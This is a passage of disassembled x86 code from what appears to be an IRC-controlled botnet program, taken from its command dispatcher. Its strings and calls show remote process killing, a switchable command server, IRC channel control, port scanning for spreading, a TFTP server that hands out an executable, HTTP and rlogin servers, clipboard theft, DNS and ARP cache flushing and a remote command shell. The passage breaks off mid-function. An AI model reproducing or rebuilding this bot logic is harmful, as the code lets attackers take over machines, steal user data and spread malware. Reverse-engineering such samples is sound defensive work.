; ---------------------------------------------------------------------------
loc_40D3F9: ; CODE XREF: sub_409557+169B�j
; sub_409557+16B2�j
push edi ; Str
call _atoi
push eax
call sub_408BC1
pop ecx
pop ecx
push 1
pop esi
cmp eax, esi
push edi
jnz short loc_40D416
push offset aProcProcessKil ; "[PROC]: Process killed ID: %s"
jmp short loc_40D41B
; ---------------------------------------------------------------------------
loc_40D416: ; CODE XREF: sub_409557+3EB6�j
push offset aProcFailedToTe ; "[PROC]: Failed to terminate process ID:"...
loc_40D41B: ; CODE XREF: sub_409557+3EBD�j
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+var_8], ebx
jnz loc_40CA6F
push ebx ; int
lea eax, [ebp+Dst]
push [ebp+var_4] ; int
push eax ; int
push [ebp+var_8C] ; Str
push [ebp+arg_4] ; int
call sub_405E64
add esp, 14h
jmp loc_40CA6F
; ---------------------------------------------------------------------------
loc_40D454: ; CODE XREF: sub_409557+166D�j
; sub_409557+1684�j
push ebx ; int
push ebx ; int
push edi ; Str2
push [ebp+var_4] ; int
push ebx ; Str
push [ebp+arg_4] ; int
call sub_4088B4
add esp, 18h
cmp eax, 1
push edi
jnz short loc_40D476
push offset aProcProcessK_0 ; "[PROC]: Process killed: %s"
jmp loc_40CC81
; ---------------------------------------------------------------------------
loc_40D476: ; CODE XREF: sub_409557+3F13�j
push offset aProcFailedTo_0 ; "[PROC]: Failed to terminate process: %s"...
jmp loc_40CC81
; ---------------------------------------------------------------------------
loc_40D480: ; CODE XREF: sub_409557+163F�j
; sub_409557+1656�j
push edi
call dword_42EBF0 ; inet_addr
cmp eax, 0FFFFFFFFh
mov [ebp+Src], eax
jz short loc_40D4BD
push 2
lea eax, [ebp+Src]
push 4
push eax
call dword_42EB70 ; gethostbyaddr
cmp eax, ebx
jz short loc_40D4D8
push dword ptr [eax]
loc_40D4A3: ; CODE XREF: sub_409557+3F7F�j
push edi
lea eax, [ebp+Dst]
push offset aDnsLookupSS_ ; "[DNS]: Lookup: %s -> %s."
push eax ; Dest
call _sprintf
add esp, 10h
jmp loc_40B799
; ---------------------------------------------------------------------------
loc_40D4BD: ; CODE XREF: sub_409557+3F36�j
push edi
call dword_42EC34 ; gethostbyname
cmp eax, ebx
jz short loc_40D4D8
mov eax, [eax+0Ch]
mov eax, [eax]
push dword ptr [eax]
call dword_42EC3C ; inet_ntoa
push eax
jmp short loc_40D4A3
; ---------------------------------------------------------------------------
loc_40D4D8: ; CODE XREF: sub_409557+3F48�j
; sub_409557+3F6F�j
push offset aDnsCouldnTReso ; "[DNS]: Couldn't resolve hostname."
loc_40D4DD: ; CODE XREF: sub_409557+35AF�j
; sub_409557+3E05�j ...
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
pop ecx
pop ecx
jmp loc_40B799
; ---------------------------------------------------------------------------
loc_40D4F0: ; CODE XREF: sub_409557+1611�j
; sub_409557+1628�j
push 7Fh ; Count
push edi ; Source
push [ebp+arg_14] ; Dest
call _strncpy
push edi
lea eax, [ebp+Dst]
push offset aMainServerChan ; "[MAIN]: Server changed to: '%s'."
push eax ; Dest
call _sprintf
add esp, 18h
jmp loc_40CA4B
; ---------------------------------------------------------------------------
loc_40D515: ; CODE XREF: sub_409557+15E3�j
; sub_409557+15FA�j
push 5
push ebx
push ebx
push edi
push offset aOpen ; "open"
push ebx
call dword_42EB34
test eax, eax
push edi
jz short loc_40D535
push offset aShellFileOpene ; "[SHELL]: File opened: %s"
jmp loc_40CC81
; ---------------------------------------------------------------------------
loc_40D535: ; CODE XREF: sub_409557+3FD2�j
push offset aShellCouldnTOp ; "[SHELL]: Couldn't open file: %s"
jmp loc_40CC81
; ---------------------------------------------------------------------------
loc_40D53F: ; CODE XREF: sub_409557+15B5�j
; sub_409557+15CC�j
mov al, [edi]
mov byte_424A60, al
movsx eax, byte ptr [edi]
push eax
push offset aMainPrefixChan ; "[MAIN]: Prefix changed to: '%c'."
jmp loc_40E756
; ---------------------------------------------------------------------------
loc_40D554: ; CODE XREF: sub_409557+1587�j
; sub_409557+159E�j
push edi ; Str
call _atoi
test eax, eax
pop ecx
jle loc_40E7D9
push edi ; Str
call _atoi
cmp eax, 1F4h
pop ecx
jge loc_40E7D9
push ebx ; Str1
push ebx ; int
lea eax, [ebp+SubStr]
push 2 ; int
push eax ; Dest
call sub_40FA38
push eax
lea eax, [ebp+Dst]
push offset aNickS_0 ; "NICK %s"
push eax ; Dest
call _sprintf
add esp, 1Ch
jmp loc_40CE66
; ---------------------------------------------------------------------------
loc_40D59F: ; CODE XREF: sub_409557+1559�j
; sub_409557+1570�j
push edi ; Str
call _atoi
test eax, eax
pop ecx
jle loc_4099D2
push edi ; Str
call _atoi
mov esi, 1F4h
pop ecx
cmp eax, esi
jge loc_4099D2
push offset aQuitLater ; "QUIT :later\r\n"
push edi ; Str
call _atoi
imul eax, 234h
pop ecx
push dword_43054C[eax] ; int
call sub_405E1E
pop ecx
pop ecx
push esi
call ds:dword_41B048 ; Sleep
push edi ; Str
call _atoi
imul eax, 234h
pop ecx
push dword_43054C[eax]
call dword_42EC48 ; closesocket
push [ebp+var_10]
push edi ; Str
call _atoi
imul eax, 234h
pop ecx
push dword_430554[eax]
call ds:dword_41B124 ; TerminateThread
push edi ; Str
call _atoi
imul eax, 234h
push edi ; Str
mov dword_430554[eax], ebx
call _atoi
imul eax, 234h
pop ecx
pop ecx
mov byte ptr dword_430340[eax], bl
jmp loc_4099D2
; ---------------------------------------------------------------------------
loc_40D648: ; CODE XREF: sub_409557+152B�j
; sub_409557+1542�j
push edi ; Str2
push offset aAll ; "all"
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_40D677
call sub_411E03
cmp eax, ebx
jle short loc_40D66D
push eax
push offset aThreadsStopped ; "[THREADS]: Stopped: %d thread(s)."
jmp loc_40B828
; ---------------------------------------------------------------------------
loc_40D66D: ; CODE XREF: sub_409557+4109�j
push offset aThreadsNoActiv ; "[THREADS]: No active threads found."
jmp loc_40DFA0
; ---------------------------------------------------------------------------
loc_40D677: ; CODE XREF: sub_409557+4100�j
mov eax, [ebp+var_A8]
lea edi, [eax+1]
cmp edi, 20h
jnb loc_4099D2
lea eax, [ebp+edi*4+Str2]
mov [ebp+File], eax
loc_40D693: ; CODE XREF: sub_409557+41AD�j
mov eax, [ebp+File]
mov esi, [eax]
cmp esi, ebx
jz loc_4099D2
push esi ; Str
call _atoi
push eax
call sub_411D75
pop ecx
pop ecx
test eax, eax
push esi
jz short loc_40D6BA
push offset aThreadsKilledT ; "[THREADS]: Killed thread: %s."
jmp short loc_40D6BF
; ---------------------------------------------------------------------------
loc_40D6BA: ; CODE XREF: sub_409557+415A�j
push offset aThreadsFailedT ; "[THREADS]: Failed to kill thread: %s."
loc_40D6BF: ; CODE XREF: sub_409557+4161�j
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+var_8], ebx
jnz short loc_40D6EF
push ebx ; int
lea eax, [ebp+Dst]
push [ebp+var_4] ; int
push eax ; int
push [ebp+var_8C] ; Str
push [ebp+arg_4] ; int
call sub_405E64
add esp, 14h
loc_40D6EF: ; CODE XREF: sub_409557+417A�j
lea eax, [ebp+Dst]
push eax
call sub_402D63
add [ebp+File], 4
inc edi
cmp edi, 20h
pop ecx
jb short loc_40D693
jmp loc_4099D2
; ---------------------------------------------------------------------------
loc_40D70B: ; CODE XREF: sub_409557+14FD�j
; sub_409557+1514�j
cmp [ebp+var_C], ebx
jz loc_40E7D9
push edi ; SubStr
push [ebp+var_C] ; Str
call _strstr
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
jz loc_40E7D9
push esi ; Args
push offset aS_0 ; "%s\r\n"
push [ebp+arg_4] ; int
call sub_405E1E
push esi
push offset aMainIrcRawS_ ; "[MAIN]: IRC Raw: %s."
jmp loc_40D048
; ---------------------------------------------------------------------------
loc_40D742: ; CODE XREF: sub_409557+14CF�j
; sub_409557+14E6�j
push edi ; Args
push offset aPartS_0 ; "PART %s\r\n"
push [ebp+arg_4] ; int
call sub_405E1E
push edi
push offset aMainPartedChan ; "[MAIN]: Parted channel: '%s'."
jmp loc_40D048
; ---------------------------------------------------------------------------
loc_40D75B: ; CODE XREF: sub_409557+14A1�j
; sub_409557+14B8�j
push [ebp+esi+var_8C]
push edi ; Args
push offset aJoinSS ; "JOIN %s %s\r\n"
push [ebp+arg_4] ; int
call sub_405E1E
push edi
push offset aMainJoinedCh_0 ; "[MAIN]: Joined channel: '%s'."
jmp loc_40CF1C
; ---------------------------------------------------------------------------
loc_40D77B: ; CODE XREF: sub_409557+1473�j
; sub_409557+148A�j
push edi ; Args
push offset aNickS ; "NICK %s\r\n"
push [ebp+arg_4] ; int
call sub_405E1E
push edi
push offset aMainNickChange ; "[MAIN]: Nick changed to: '%s'."
jmp loc_40D048
; ---------------------------------------------------------------------------
loc_40D794: ; CODE XREF: sub_409557+1438�j
; sub_409557+144D�j
mov al, byte_41F252
mov [ebp+Src], ebx
cmp al, bl
mov edx, offset byte_41F252
jz loc_4099D2
mov ecx, edx
loc_40D7AB: ; CODE XREF: sub_409557+425C�j
inc [ebp+Src]
add ecx, 0Bh
cmp [ecx], bl
jnz short loc_40D7AB
cmp al, bl
jz loc_4099D2
mov [ebp+Str1], edx
loc_40D7C0: ; CODE XREF: sub_409557+4523�j
push 8
call sub_411E82
pop ecx
mov ecx, eax
mov eax, 190h
cdq
idiv [ebp+Src]
add eax, ecx
cmp eax, 258h
jle short loc_40D80F
push ecx
lea eax, [ebp+Dst]
push offset aScanAlreadyDSc ; "[SCAN]: Already %d scanning threads. To"...
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push [ebp+var_4] ; int
push eax ; int
push [ebp+var_8C] ; Str
push [ebp+arg_4] ; int
call sub_405E64
add esp, 20h
jmp loc_40DA71
; ---------------------------------------------------------------------------
loc_40D80F: ; CODE XREF: sub_409557+4283�j
or [ebp+var_300], 0FFFFFFFFh
cmp dword_41F090, ebx
mov [ebp+var_304], 0A0h
mov [ebp+var_318], 5
mov [ebp+var_314], ebx
mov [ebp+Src], ebx
jz short loc_40D87C
mov eax, [ebp+Str1]
mov edi, offset dword_41F090
lea esi, [eax-0Ah]
loc_40D846: ; CODE XREF: sub_409557+4307�j
lea eax, [edi-28h]
push esi ; Str2
push eax ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jz short loc_40D862
inc [ebp+Src]
add edi, 3Ch
cmp [edi], ebx
jnz short loc_40D846
jmp short loc_40D87C
; ---------------------------------------------------------------------------
loc_40D862: ; CODE XREF: sub_409557+42FD�j
mov eax, [ebp+Src]
mov ecx, eax
mov [ebp+var_300], eax
imul ecx, 3Ch
mov ecx, dword_41F090[ecx]
mov [ebp+var_31C], ecx
loc_40D87C: ; CODE XREF: sub_409557+42E2�j
; sub_409557+4309�j
cmp [ebp+var_31C], ebx
jz loc_40DA85
push 10h
lea eax, [ebp+Dest]
pop esi
push eax
lea eax, [ebp+var_2D8]
push eax
mov [ebp+Dest], esi
push [ebp+arg_4]
call dword_42EB5C ; getsockname
mov al, [ebp+var_9B3]
push esi ; Args
neg al
sbb eax, eax
and ax, 100h
add eax, 0FFFFh
and [ebp+Drive], eax
push [ebp+Drive] ; Count
call dword_42EC3C ; inet_ntoa
push eax ; Source
lea eax, [ebp+var_430]
push eax ; Dest
call _strncpy
xor eax, eax
cmp [ebp+var_9B3], bl
push 30h ; Ch
setnz al
inc eax
inc eax
mov edi, eax
lea eax, [ebp+var_430]
push eax ; Str
call _strrchr
add esp, 14h
cmp edi, ebx
mov byte ptr [ebp+File+3], bl
jle short loc_40D91E
loc_40D8FC: ; CODE XREF: sub_409557+43C5�j
cmp eax, ebx
jz short loc_40D91E
mov byte ptr [eax], 78h
lea eax, [ebp+var_430]
push 30h ; Ch
push eax ; Str
call _strrchr
inc byte ptr [ebp+File+3]
pop ecx
pop ecx
movsx ecx, byte ptr [ebp+File+3]
cmp ecx, edi
jl short loc_40D8FC
loc_40D91E: ; CODE XREF: sub_409557+43A3�j
; sub_409557+43A7�j
mov eax, [ebp+arg_4]
push [ebp+var_8C] ; Format
mov esi, [ebp+var_4]
mov [ebp+var_320], eax
mov eax, [ebp+var_8]
push 80h ; Count
mov [ebp+var_2F4], eax
lea eax, [ebp+var_420]
push eax ; Dest
mov [ebp+var_2F0], 1
mov [ebp+var_2F8], esi
call __snprintf
mov edi, offset aFf_0 ; "#ff-"
push offset byte_428D64 ; Str2
push edi ; Str1
call _strcmp
add esp, 14h
test eax, eax
jz short loc_40D988
push edi ; Format
lea eax, [ebp+var_3A0]
push 80h ; Count
push eax ; Dest
call __snprintf
add esp, 0Ch
jmp short loc_40D98E
; ---------------------------------------------------------------------------
loc_40D988: ; CODE XREF: sub_409557+4418�j
mov [ebp+var_3A0], bl
loc_40D98E: ; CODE XREF: sub_409557+442F�j
cmp [ebp+var_2F0], ebx
mov eax, offset aRandom_0 ; "Random"
jnz short loc_40D9A0
mov eax, offset aSequential ; "Sequential"
loc_40D9A0: ; CODE XREF: sub_409557+4442�j
push [ebp+var_304]
lea ecx, [ebp+var_430]
push [ebp+var_314]
push [ebp+var_318]
push [ebp+var_31C]
push ecx
push eax
lea eax, [ebp+Dst]
push offset aScanSPortScanS ; "[SCAN]: %s Port Scan started on %s:%d w"...
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push 8 ; int
push eax ; Source
call sub_411C3A
add esp, 2Ch
mov [ebp+var_310], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_430]
push ebx
push eax
push offset sub_402A0C
push ebx
push ebx
call ds:dword_41B064 ; CreateThread
mov ecx, [ebp+var_310]
imul ecx, 234h
cmp eax, ebx
mov dword_430554[ecx], eax
jz short loc_40DA2A
loc_40DA18: ; CODE XREF: sub_409557+44D1�j
cmp [ebp+var_2EC], ebx
jnz short loc_40DA45
push 32h
call ds:dword_41B048 ; Sleep
jmp short loc_40DA18
; ---------------------------------------------------------------------------
loc_40DA2A: ; CODE XREF: sub_409557+44BF�j
call ds:dword_41B060 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+Dst]
push offset aScanFailedTo_1 ; "[SCAN]: Failed to start scan thread, er"...
push eax ; Dest
call _sprintf
add esp, 0Ch
loc_40DA45: ; CODE XREF: sub_409557+44C7�j
cmp [ebp+var_8], ebx
jnz short loc_40DA64
push ebx ; int
lea eax, [ebp+Dst]
push esi ; int
push eax ; int
push [ebp+var_8C] ; Str
push [ebp+arg_4] ; int
call sub_405E64
add esp, 14h
loc_40DA64: ; CODE XREF: sub_409557+44F1�j
lea eax, [ebp+Dst]
push eax
call sub_402D63
pop ecx
loc_40DA71: ; CODE XREF: sub_409557+42B3�j
add [ebp+Str1], 0Bh
mov eax, [ebp+Str1]
cmp [eax], bl
jnz loc_40D7C0
jmp loc_4099D2
; ---------------------------------------------------------------------------
loc_40DA85: ; CODE XREF: sub_409557+2968�j
; sub_409557+432B�j
push offset aScanFailedTo_2 ; "[SCAN]: Failed to start scan, port is i"...
jmp loc_40DFA0
; ---------------------------------------------------------------------------
loc_40DA8F: ; CODE XREF: sub_409557+140E�j
; sub_409557+1423�j
push 4
call sub_411E82
test eax, eax
pop ecx
jle short loc_40DAA5
push offset aTftpAlreadyRun ; "[TFTP]: Already running."
jmp loc_40ADC3
; ---------------------------------------------------------------------------
loc_40DAA5: ; CODE XREF: sub_409557+4542�j
mov eax, dword ptr [ebp+esi+Args]
cmp eax, ebx
jz short loc_40DAC8
push eax ; Format
mov edi, 104h
lea eax, [ebp+var_804]
push edi ; Count
push eax ; Dest
call __snprintf
add esp, 0Ch
jmp short loc_40DADC
; ---------------------------------------------------------------------------
loc_40DAC8: ; CODE XREF: sub_409557+4557�j
mov edi, 104h
lea eax, [ebp+var_804]
push edi
push eax
push ebx
call ds:dword_41B068 ; GetModuleFileNameA
loc_40DADC: ; CODE XREF: sub_409557+456F�j
mov esi, [ebp+esi+var_8C]
cmp esi, ebx
jnz short loc_40DAEC
mov esi, offset aGvujaleodq_exe ; "gvujaleodq.exe"
loc_40DAEC: ; CODE XREF: sub_409557+458E�j
push esi ; Format
lea eax, [ebp+var_700]
push edi ; Count
push eax ; Dest
call __snprintf
mov eax, dword_424A48
push 7Fh ; Count
push [ebp+var_8C] ; Source
mov [ebp+var_5F4], eax
mov eax, [ebp+arg_4]
mov [ebp+var_5F8], ebx
mov [ebp+var_808], eax
lea eax, [ebp+var_5F0]
push eax ; Dest
call _strncpy
mov eax, [ebp+var_4]
mov [ebp+var_570], eax
mov eax, [ebp+var_8]
mov [ebp+var_56C], eax
lea eax, [ebp+var_700]
push eax
lea eax, [ebp+var_804]
push eax
lea eax, [ebp+Dst]
push [ebp+var_5F4]
push offset aTftpServerStar ; "[TFTP]: Server started on Port: %d, Fil"...
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push 4 ; int
push eax ; Source
call sub_411C3A
add esp, 38h
mov [ebp+var_5FC], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_808]
push ebx
push eax
push offset sub_411743
push ebx
push ebx
call ds:dword_41B064 ; CreateThread
mov ecx, [ebp+var_5FC]
imul ecx, 234h
cmp eax, ebx
mov dword_430554[ecx], eax
jz short loc_40DBBC
loc_40DBA6: ; CODE XREF: sub_409557+4663�j
cmp [ebp+var_568], ebx
jnz loc_40CA4B
push 32h
call ds:dword_41B048 ; Sleep
jmp short loc_40DBA6
; ---------------------------------------------------------------------------
loc_40DBBC: ; CODE XREF: sub_409557+464D�j
call ds:dword_41B060 ; RtlGetLastWin32Error
push eax
push offset aTftpFailedTo_0 ; "[TFTP]: Failed to start server thread, "...
jmp loc_40E756
; ---------------------------------------------------------------------------
loc_40DBCD: ; CODE XREF: sub_409557+13E4�j
; sub_409557+13F9�j
mov edi, dword ptr [ebp+esi+Args]
cmp edi, ebx
jz short loc_40DBEC
push edi ; Str
call _atoi
test eax, eax
pop ecx
jz short loc_40DBEC
push edi ; Str
call _atoi
pop ecx
jmp short loc_40DBF1
; ---------------------------------------------------------------------------
loc_40DBEC: ; CODE XREF: sub_409557+467F�j
; sub_409557+468A�j
mov eax, dword_424A4C
loc_40DBF1: ; CODE XREF: sub_409557+4693�j
mov esi, [ebp+esi+var_8C]
mov [ebp+var_584], eax
xor eax, eax
cmp [ebp+var_9B0], bl
setz al
cmp esi, ebx
mov [ebp+var_570], eax
jz short loc_40DC24
lea eax, [ebp+var_688]
push esi ; Format
push eax ; Dest
call _sprintf
pop ecx
pop ecx
jmp short loc_40DC4F
; ---------------------------------------------------------------------------
loc_40DC24: ; CODE XREF: sub_409557+46BA�j
lea eax, [ebp+FullPath]
push 104h
push eax
call ds:dword_41B098 ; GetSystemDirectoryA
push ebx ; Ext
push ebx ; Filename
lea eax, [ebp+Drive]
push ebx ; Dir
push eax ; Drive
lea eax, [ebp+FullPath]
push eax ; FullPath
call __splitpath
add esp, 14h
loc_40DC4F: ; CODE XREF: sub_409557+46CB�j
lea eax, [ebp+var_688]
push eax ; Str
call _strlen
cmp [ebp+eax+var_689], 5Ch
pop ecx
jnz short loc_40DC7A
lea eax, [ebp+var_688]
push eax ; Str
call _strlen
pop ecx
mov [ebp+eax+var_689], bl
loc_40DC7A: ; CODE XREF: sub_409557+470D�j
push [ebp+var_8C] ; Format
mov esi, [ebp+arg_4]
lea eax, [ebp+var_910]
mov [ebp+var_914], esi
push 80h ; Count
push eax ; Dest
call __snprintf
mov eax, [ebp+var_8]
mov edi, [ebp+var_4]
add esp, 0Ch
mov [ebp+var_574], eax
lea eax, [ebp+var_688]
mov [ebp+var_578], edi
push eax
push [ebp+var_584]
push esi
call sub_408401
pop ecx
push eax
lea eax, [ebp+Dst]
push offset aHttpdServerLis ; "[HTTPD]: Server listening on IP: %s:%d,"...
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push 3 ; int
push eax ; Source
call sub_411C3A
add esp, 20h
mov [ebp+var_57C], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_914]
push ebx
push eax
push offset sub_404771
push ebx
push ebx
call ds:dword_41B064 ; CreateThread
mov ecx, [ebp+var_57C]
imul ecx, 234h
cmp eax, ebx
mov dword_430554[ecx], eax
jz short loc_40DD32
loc_40DD1C: ; CODE XREF: sub_409557+47D9�j
cmp [ebp+var_568], ebx
jnz loc_40DE81
push 32h
call ds:dword_41B048 ; Sleep
jmp short loc_40DD1C
; ---------------------------------------------------------------------------
loc_40DD32: ; CODE XREF: sub_409557+47C3�j
call ds:dword_41B060 ; RtlGetLastWin32Error
push eax
push offset aHttpdFailedT_1 ; "[HTTPD]: Failed to start server thread,"...
jmp loc_40DE72
; ---------------------------------------------------------------------------
loc_40DD43: ; CODE XREF: sub_409557+13BA�j
; sub_409557+13CF�j
mov edi, dword ptr [ebp+esi+Args]
cmp edi, ebx
jz short loc_40DD62
push edi ; Str
call _atoi
test eax, eax
pop ecx
jz short loc_40DD62
push edi ; Str
call _atoi
pop ecx
jmp short loc_40DD67
; ---------------------------------------------------------------------------
loc_40DD62: ; CODE XREF: sub_409557+47F5�j
; sub_409557+4800�j
mov eax, dword_424A50
loc_40DD67: ; CODE XREF: sub_409557+4809�j
mov [ebp+var_580], eax
mov eax, [ebp+esi+var_8C]
cmp eax, ebx
jnz short loc_40DD7E
lea eax, [ebp+var_C4]
loc_40DD7E: ; CODE XREF: sub_409557+481F�j
push eax ; Format
lea eax, [ebp+var_6C0]
push 40h ; Count
push eax ; Dest
call __snprintf
mov esi, [ebp+esi+var_88]
add esp, 0Ch
cmp esi, ebx
jnz short loc_40DDA0
mov esi, offset byte_428D64
loc_40DDA0: ; CODE XREF: sub_409557+4842�j
push esi ; Format
lea eax, [ebp+var_680]
push 100h ; Count
push eax ; Dest
call __snprintf
push [ebp+var_8C] ; Format
lea eax, [ebp+var_740]
push 80h ; Count
push eax ; Dest
call __snprintf
mov eax, [ebp+var_8]
mov esi, [ebp+arg_4]
mov edi, [ebp+var_4]
add esp, 18h
mov [ebp+var_56C], eax
lea eax, [ebp+var_6C0]
push eax
mov [ebp+var_744], esi
push [ebp+var_580]
mov [ebp+var_570], edi
push esi
call sub_408401
pop ecx
push eax
lea eax, [ebp+Dst]
push offset aRlogindServerL ; "[RLOGIND]: Server listening on IP: %s:%"...
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push 6 ; int
push eax ; Source
call sub_411C3A
add esp, 20h
mov [ebp+var_57C], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_744]
push ebx
push eax
push offset sub_40F445
push ebx
push ebx
call ds:dword_41B064 ; CreateThread
mov ecx, [ebp+var_57C]
imul ecx, 234h
cmp eax, ebx
mov dword_430554[ecx], eax
jz short loc_40DE66
loc_40DE54: ; CODE XREF: sub_409557+490D�j
cmp [ebp+var_568], ebx
jnz short loc_40DE81
push 32h
call ds:dword_41B048 ; Sleep
jmp short loc_40DE54
; ---------------------------------------------------------------------------
loc_40DE66: ; CODE XREF: sub_409557+48FB�j
call ds:dword_41B060 ; RtlGetLastWin32Error
push eax
push offset aRlogindFailedT ; "[RLOGIND]: Failed to start server threa"...
loc_40DE72: ; CODE XREF: sub_409557+2E82�j
; sub_409557+2F7C�j ...
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
add esp, 0Ch
loc_40DE81: ; CODE XREF: sub_409557+2E66�j
; sub_409557+2F60�j ...
cmp [ebp+var_8], ebx
jnz loc_40B858
push ebx
push edi
loc_40DE8C: ; CODE XREF: sub_409557+272C�j
lea eax, [ebp+Dst]
push eax
push [ebp+var_8C]
push esi
jmp loc_40B850
; ---------------------------------------------------------------------------
loc_40DE9F: ; CODE XREF: sub_409557+1390�j
; sub_409557+13A5�j
mov esi, dword ptr [ebp+esi+Args]
cmp esi, ebx
jz short loc_40DEB2
push esi ; Str
call _atoi
jmp short loc_40DEB9
; ---------------------------------------------------------------------------
loc_40DEB2: ; CODE XREF: sub_409557+4951�j
push 8
call sub_411EA1
loc_40DEB9: ; CODE XREF: sub_409557+4959�j
cmp eax, ebx
pop ecx
jz loc_40E7D9
push eax ; int
push [ebp+var_4] ; int
push [ebp+var_8C] ; Str
push [ebp+arg_4] ; int
call sub_40226C
loc_40DED4: ; CODE XREF: sub_409557+4DFC�j
add esp, 10h
jmp loc_40E7D9
; ---------------------------------------------------------------------------
loc_40DEDC: ; CODE XREF: sub_409557+1366�j
; sub_409557+137B�j
mov eax, dword_42EAEC
cmp eax, ebx
jz short loc_40DEF9
call eax ; DnsFlushResolverCache
test eax, eax
jz short loc_40DEF2
push offset aFlushdnsDnsCac ; "[FLUSHDNS]: DNS cache flushed."
jmp short loc_40DF0E
; ---------------------------------------------------------------------------
loc_40DEF2: ; CODE XREF: sub_409557+4992�j
push offset aFlushdnsFailed ; "[FLUSHDNS]: Failed to flush DNS cache."
jmp short loc_40DF0E
; ---------------------------------------------------------------------------
loc_40DEF9: ; CODE XREF: sub_409557+498C�j
push offset aFlushdnsFail_0 ; "[FLUSHDNS]: Failed to load dnsapi.dll."
jmp short loc_40DF0E
; ---------------------------------------------------------------------------
loc_40DF00: ; CODE XREF: sub_409557+133C�j
; sub_409557+1351�j
call sub_408323
test eax, eax
jz short loc_40DF24
push offset aFlushdnsArpC_0 ; "[FLUSHDNS]: ARP cache flushed."
loc_40DF0E: ; CODE XREF: sub_409557+4999�j
; sub_409557+49A0�j ...
lea eax, [ebp+Dst]
push 200h ; Count
push eax ; Dest
call __snprintf
jmp loc_40CC8D
; ---------------------------------------------------------------------------
loc_40DF24: ; CODE XREF: sub_409557+49B0�j
push offset aFlushdnsFail_1 ; "[FLUSHDNS]: Failed to flush ARP cache."
jmp short loc_40DF0E
; ---------------------------------------------------------------------------
loc_40DF2B: ; CODE XREF: sub_409557+1312�j
; sub_409557+1327�j
cmp [ebp+var_8], ebx
jnz short loc_40DF4A
push ebx ; int
push [ebp+var_4] ; int
push offset aClipboardData ; "-[Clipboard Data]-"
push [ebp+var_8C] ; Str
push [ebp+arg_4] ; int
call sub_405E64
add esp, 14h
loc_40DF4A: ; CODE XREF: sub_409557+49D7�j
push ebx ; int
push [ebp+var_4] ; int
call sub_4070C7
push eax ; int
push [ebp+var_8C] ; Str
push [ebp+arg_4] ; int
call sub_405E64
push offset aMainGetClipboa ; "[MAIN]: Get Clipboard."
jmp loc_40E222
; ---------------------------------------------------------------------------
loc_40DF6C: ; CODE XREF: sub_409557+1232�j
; sub_409557+1247�j
push 7
call sub_411E82
test eax, eax
pop ecx
jle short loc_40DF7F
push offset aCmdRemoteShell ; "[CMD]: Remote shell already running."
jmp short loc_40DFA0
; ---------------------------------------------------------------------------
loc_40DF7F: ; CODE XREF: sub_409557+4A1F�j
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40F002
pop ecx
cmp eax, 0FFFFFFFFh
pop ecx
jnz short loc_40DF9B
push offset aCmdCouldnTOpen ; "[CMD]: Couldn't open remote shell."
jmp short loc_40DFA0
; ---------------------------------------------------------------------------
loc_40DF9B: ; CODE XREF: sub_409557+4A3B�j
push offset aCmdRemoteShe_0 ; "[CMD]: Remote shell ready."
loc_40DFA0: ; CODE XREF: sub_409557+24C9�j
; sub_409557+25F9�j ...
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
pop ecx
pop ecx
jmp loc_40B837
; ---------------------------------------------------------------------------
loc_40DFB3: ; CODE XREF: sub_409557+1208�j
; sub_409557+121D�j
push [ebp+var_8] ; int
push [ebp+var_4] ; int
push [ebp+var_8C] ; Str
push [ebp+arg_4] ; int
call sub_406AE8
jmp loc_40E240
; ---------------------------------------------------------------------------
loc_40DFCC: ; CODE XREF: sub_409557+11DE�j
; sub_409557+11F3�j
push dword ptr [ebp+esi+Args] ; int
push [ebp+var_4] ; int
push [ebp+var_8C] ; Str
push [ebp+arg_4] ; int
call sub_403D46
jmp loc_40E240
; ---------------------------------------------------------------------------
loc_40DFE9: ; CODE XREF: sub_409557+11B4�j
; sub_409557+11C9�j
or edi, 0FFFFFFFFh
call ds:dword_41B078 ; GetTickCount
xor edx, edx
mov ecx, 3E8h
div ecx
mov esi, dword ptr [ebp+esi+Args]
cmp esi, ebx
mov [ebp+Src], eax
jz short loc_40E012
push esi ; Str
call _atoi
pop ecx
mov edi, eax
loc_40E012: ; CODE XREF: sub_409557+4AB0�j
mov eax, [ebp+Src]
xor edx, edx
mov ecx, 15180h
div ecx
cmp eax, edi
jnb short loc_40E02B
cmp edi, 0FFFFFFFFh
jnz loc_40E7D9
loc_40E02B: ; CODE XREF: sub_409557+4AC9�j
push ebx
call sub_410D66
push eax
lea eax, [ebp+Dst]
push offset aMainUptimeS_ ; "[MAIN]: Uptime: %s."
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push [ebp+var_4] ; int
push eax ; int
push [ebp+var_8C] ; Str
push [ebp+arg_4] ; int
call sub_405E64
lea eax, [ebp+Dst]
push eax
call sub_402D63
jmp loc_40C20E
; ---------------------------------------------------------------------------
loc_40E06D: ; CODE XREF: sub_409557+118A�j
; sub_409557+119F�j
push 1Eh
call sub_411E82
test eax, eax
pop ecx
jle short loc_40E0A1
cmp [ebp+var_8], ebx
jnz loc_4099D2
push ebx ; int
push [ebp+var_4] ; int
push offset aProcAlreadyRun ; "[PROC]: Already running."
push [ebp+var_8C] ; Str
push [ebp+arg_4] ; int
call sub_405E64
add esp, 14h
jmp loc_4099D2
; ---------------------------------------------------------------------------
loc_40E0A1: ; CODE XREF: sub_409557+4B20�j
push [ebp+var_8C] ; Format
lea eax, [ebp+var_4DC]
push 80h ; Count
push eax ; Dest
